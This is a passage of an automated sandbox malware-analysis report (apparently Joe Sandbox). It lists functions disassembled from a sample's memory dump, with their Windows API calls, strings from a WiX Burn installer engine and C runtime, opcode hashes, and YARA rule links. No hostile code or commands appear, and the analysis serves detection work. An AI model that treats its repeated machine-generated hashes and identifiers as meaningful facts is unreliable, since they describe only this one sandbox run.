                                                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                            • Opcode ID: 65ece9eb7c8233ce75149e70c5b4bf33a68cf2a6b4ce45e0a75231743dd308ee
                                                                                                                                                                                                                                                                            • Instruction ID: 76480b8fbe60b246888391de5c36e9131a898d42d9ef08e11883159ba4de9eb9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65ece9eb7c8233ce75149e70c5b4bf33a68cf2a6b4ce45e0a75231743dd308ee
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8E04F34A84205BBEF201FA0FC06F283A6CFB12B41F104030FA0DE80E4E7A2E9109A45
                                                                                                                                                                                                                                                                            Function 009365B5 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(D7B140E6,00000000,00000000,?), ref: 00936618
                                                                                                                                                                                                                                                                              • Part of subcall function 00931F7B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0093628B,?,00000000,-00000008), ref: 00931FDC
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0093686A
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 009368B0
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00936953
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2112829910-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4a65d25d634e4a7def7c504204cdd49a83508b64710c34689575892b7f863c86
                                                                                                                                                                                                                                                                            • Instruction ID: 874240e1c64ef8b335c604bc7e60c1dde76e82dbf5cb9a13a681ddfb692d66e5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a65d25d634e4a7def7c504204cdd49a83508b64710c34689575892b7f863c86
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADD19D75D04249EFCF15CFA8C890AADBBB8FF49314F24852AE566EB351D630A942CF50
                                                                                                                                                                                                                                                                            Function 0092A01A Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                            • Opcode ID: ebca2a9a3275a4645834e4f99eb1bae9c66cdcd749ea2f42d180aaf77cbcc2c2
                                                                                                                                                                                                                                                                            • Instruction ID: 658e65e3a3c8608de4b3a904df6fefc8c47a8294d7eefd55a325a4b496f3f867
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebca2a9a3275a4645834e4f99eb1bae9c66cdcd749ea2f42d180aaf77cbcc2c2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 255108736092229FDB298F54FD41BBAB7A9FF41320F14442DE8055729AE735EC50C792
                                                                                                                                                                                                                                                                            Function 008EC8CA Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 008EC932
                                                                                                                                                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 008EC93A
                                                                                                                                                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 008EC942
                                                                                                                                                                                                                                                                            • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 008EC96F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2793162063-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2d1624145d0fdc912b21009ef8e275f95f794e11fa4394b71af85ebd491434b6
                                                                                                                                                                                                                                                                            • Instruction ID: 997b9b6f847f03685bacd54a57ea3caced489e768286c0b1c423a1d7530c81d1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d1624145d0fdc912b21009ef8e275f95f794e11fa4394b71af85ebd491434b6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A111F75E5422CAADB249F55DC06BDEBBB8FF09B00F00809AB509A6281D6B45B808FD4
                                                                                                                                                                                                                                                                            Function 008EB4F2 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 41COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(7FFFFFFE,00000000,?,?,008E85B0,00000000,?,008FA80F,?,00000001,00000000,?,00000002,-00000001,00000008,?), ref: 008EB4FE
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(7FFFFFFE,7FFFFFFE,?,00000000,?,?,008E85B0,00000000,?,008FA80F,?,00000001,00000000,?,00000002,-00000001), ref: 008EB55D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get visibility of variable: %ls, xrefs: 008EB52E
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008EB540
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Failed to get visibility of variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-1405185440
                                                                                                                                                                                                                                                                            • Opcode ID: 4e3e3d898c28287a405788bb1042edcba0099736be838824e42b80c49633a4ce
                                                                                                                                                                                                                                                                            • Instruction ID: 04dcdf01a0cb18f16d7302cc11becb0da0a5aeb9fc8a3a5f7fe2587d2aafeae9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e3e3d898c28287a405788bb1042edcba0099736be838824e42b80c49633a4ce
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41018B75640258FFDF029F85CC0AEAE3BA4FB06766F008010FD15AB260D7B1AE10DBA0
                                                                                                                                                                                                                                                                            Function 008EEAF6 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 39COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000001,008E7D5B,00000000,?,0090445E,?,008E7D93,008E7E23,00000000,008E7E23,BootstrapperApplicationData.xml,008E7D97,008E7E0B,?,008E7E23,008E80EB), ref: 008EEB3A
                                                                                                                                                                                                                                                                              • Part of subcall function 0090ED3E: SetEvent.KERNEL32(?,008E7E23,00000001,00000000,?,008EEB0E,00000001,008E7D5B,00000000,?,0090445E,?,008E7D93,008E7E23,00000000,008E7E23), ref: 0090ED5B
                                                                                                                                                                                                                                                                              • Part of subcall function 0090ED3E: GetLastError.KERNEL32(?,008EEB0E,00000001,008E7D5B,00000000,?,0090445E,?,008E7D93,008E7E23,00000000,008E7E23,BootstrapperApplicationData.xml,008E7D97,008E7E0B,?), ref: 0090ED65
                                                                                                                                                                                                                                                                              • Part of subcall function 0090ED3E: CloseHandle.KERNEL32(?,00000001,00000000,?,008EEB0E,00000001,008E7D5B,00000000,?,0090445E,?,008E7D93,008E7E23,00000000,008E7E23,BootstrapperApplicationData.xml), ref: 0090EDE1
                                                                                                                                                                                                                                                                              • Part of subcall function 0090ED3E: CloseHandle.KERNEL32(?,00000001,00000000,?,008EEB0E,00000001,008E7D5B,00000000,?,0090445E,?,008E7D93,008E7E23,00000000,008E7E23,BootstrapperApplicationData.xml), ref: 0090EDF4
                                                                                                                                                                                                                                                                              • Part of subcall function 0090ED3E: CloseHandle.KERNEL32(?,00000001,00000000,?,008EEB0E,00000001,008E7D5B,00000000,?,0090445E,?,008E7D93,008E7E23,00000000,008E7E23,BootstrapperApplicationData.xml), ref: 0090EE07
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to close cabinet., xrefs: 008EEB14
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 008EEB3A
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\container.cpp, xrefs: 008EEB26
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$ErrorEventLast
                                                                                                                                                                                                                                                                            • String ID: Failed to close cabinet.$d:\a\wix4\wix4\src\burn\engine\container.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 477349713-3805376996
                                                                                                                                                                                                                                                                            • Opcode ID: 46ac0d3346ab289ca6a0db142cd191c117b45861d5c6e91c0c08270a562ac612
                                                                                                                                                                                                                                                                            • Instruction ID: e972e748517bb65cb0a78f9400ddd631b522e4f5e55bd29f9a48e27fa950736b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46ac0d3346ab289ca6a0db142cd191c117b45861d5c6e91c0c08270a562ac612
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDF02B31A4062337C221165A9C07F17FB68EFA2F31F000311FA10F61D0E7A1945182E1
                                                                                                                                                                                                                                                                            Function 00938CE7 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00937E50,00000000,00000001,?,?,?,009369A7,?,00000000,00000000), ref: 00938CFE
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00937E50,00000000,00000001,?,?,?,009369A7,?,00000000,00000000,?,?,?,00936F4A,00000000), ref: 00938D0A
                                                                                                                                                                                                                                                                              • Part of subcall function 00938CD0: CloseHandle.KERNEL32(FFFFFFFE,00938D1A,?,00937E50,00000000,00000001,?,?,?,009369A7,?,00000000,00000000,?,?), ref: 00938CE0
                                                                                                                                                                                                                                                                            • ___initconout.LIBCMT ref: 00938D1A
                                                                                                                                                                                                                                                                              • Part of subcall function 00938C91: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00938CC0,00937E3D,?,?,009369A7,?,00000000,00000000,?), ref: 00938CA4
                                                                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00937E50,00000000,00000001,?,?,?,009369A7,?,00000000,00000000,?), ref: 00938D2F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                            • Opcode ID: fb4ee0cfc26613dc6c032579411562863d98504780c8327a27478a7b1ed46d89
                                                                                                                                                                                                                                                                            • Instruction ID: 1102b13903a6c614028e44f91b89aaa1d1b116921e9b4e9fe00500d083acfdda
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb4ee0cfc26613dc6c032579411562863d98504780c8327a27478a7b1ed46d89
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10F03036015254BBCF226FD5DC09E8A3F6AFB4A3A1F004455FE6895170DB32C920EF91
                                                                                                                                                                                                                                                                            Function 008E69E0 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 008E69E9
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,?,00000000), ref: 008E6A06
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E6A10
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 008E6A17
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterErrorEventLastLeave
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2851136515-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2eff54ccb26b17d7e14e19e458abe696e3cbe54ab9693ef1560eacc317d88fd7
                                                                                                                                                                                                                                                                            • Instruction ID: 26baffcbc98b49679176e091783e090df6cf1260e1559e219666f1291313299e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2eff54ccb26b17d7e14e19e458abe696e3cbe54ab9693ef1560eacc317d88fd7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68E0923A210515A7CB116FA6EC08E8A7BBCFF9A761B004025F611D3121EA70E5159BA1
                                                                                                                                                                                                                                                                            Function 0093AC92 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0097D4F0,00000000,008FA8C6,00000008,?,00000000,00000000,?,?), ref: 0093AC99
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF), ref: 0093ACB4
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(0097D4F0), ref: 0093ACEE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$CloseEnterHandleLeave
                                                                                                                                                                                                                                                                            • String ID: .Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2394387412-727612987
                                                                                                                                                                                                                                                                            • Opcode ID: 9e272ae865e2aaa00e920034650dfa550c6d6355b66d762fcefb48fd3f81a169
                                                                                                                                                                                                                                                                            • Instruction ID: d3edcb6d3493807c65999d74740af73ce74b84677becfcf67e660a2b668654b7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e272ae865e2aaa00e920034650dfa550c6d6355b66d762fcefb48fd3f81a169
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13F05E7262A200ABD7209B39FD4CF5532ACBF42721F040204A458D32F0C774E881AE12
                                                                                                                                                                                                                                                                            Function 0092A616 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 0092A63B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: EncodePointer
                                                                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                                            • Opcode ID: aa558697429aee5beff4100b9a8c04f3e21c8eecccd58bd9dc827b3993e1b4cf
                                                                                                                                                                                                                                                                            • Instruction ID: 9f224ec6b7c36c1dc09c6fcf48ed3e7ded13167c8db72ad1b3fe2f30d07a7971
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa558697429aee5beff4100b9a8c04f3e21c8eecccd58bd9dc827b3993e1b4cf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19416A32900219EFCF15DF94EC81AAE7BB9BF48304F198159F904A7229D3359950DF56
                                                                                                                                                                                                                                                                            Function 0090D8F2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variant.cpp, xrefs: 0090D99A
                                                                                                                                                                                                                                                                            • Failed to copy variant value., xrefs: 0090D988
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Failed to copy variant value.$d:\a\wix4\wix4\src\burn\engine\variant.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2001391462-3907457943
                                                                                                                                                                                                                                                                            • Opcode ID: d380631b48c6b0ced94f58abe076df90783eeb22fe7bc6202bfa0e8c996430f1
                                                                                                                                                                                                                                                                            • Instruction ID: b3a074c439e408cb796376e7de1fe407a566c0bcb96cbb0f20a0bc96b689aed8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d380631b48c6b0ced94f58abe076df90783eeb22fe7bc6202bfa0e8c996430f1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A221F532903215BEE721AEECCC85FBEF66CEB46B10F140926F530A61C0D2749D40D6A2
                                                                                                                                                                                                                                                                            Function 009180DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,008E6DEA,00000000,008E7162,00000000,00000257,54B7FF10), ref: 00918132
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\mspengine.cpp, xrefs: 00918188
                                                                                                                                                                                                                                                                            • Failed to add chained patch., xrefs: 00918176
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
